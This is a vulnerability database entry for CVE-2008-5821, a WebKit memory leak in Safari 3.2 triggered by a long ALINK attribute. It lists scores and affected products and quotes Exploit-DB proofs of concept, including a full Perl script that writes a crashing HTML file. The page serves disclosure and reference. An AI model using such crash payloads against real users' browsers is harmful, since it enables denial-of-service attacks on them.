CVE-2008-5821
Published 2009-01-02
Priority: P4 · 22 · medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.92% (89.0th percentile)
Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
No detection rules found.
Exploit-DB
Apple Safari 4.0.5 (531.22.7) - Denial of Service
exploitdb·2010-04-26
---
```perl
#!/usr/bin/perl
# Safari 4.0.5 (531.22.7) Denial of Service
# Exploit Title: [Safari 4.0.5 (531.22.7) Denial of Service]
# Date: [2010-04-26]
# Author: [Xss mAn]
# Software Link: [http://www.apple.com/safari/download/]
# Version: [Safari 4.0.5 (531.22.7)]
# Tested on: [windows 7]
#Gr33t [2] : T-T34M
$headr1="\n\n";
$headr2="\nbody {alink: "."A/" x 13333337 ."}\n";
$headr3="\n";
open(file ,'>>Crash.html');
print file $headr1.$headr2.$headr3;
close(file);
#perl 4 M3N ;)
```
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)
exploitdb·2009-01-01
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, causing a denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
```
# -----------------------------------
# Exploit Title: Apple iPhone Safari (body alink) Remote Crash
# Date: 19/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari
# Launch Safari, point your brows
```
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
exploitdb·2009-01-01
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, causing a denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
```perl
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_
```
No writeups or analysis indexed.
http://jbrownsec.blogspot.com/2008/12/new-year-research-are-upon-us.html
http://packetstormsecurity.org/0812-exploits/safari_webkit_ml.txt
http://www.securityfocus.com/bid/33080
https://exchange.xforce.ibmcloud.com/vulnerabilities/47724
Published: 2009-01-02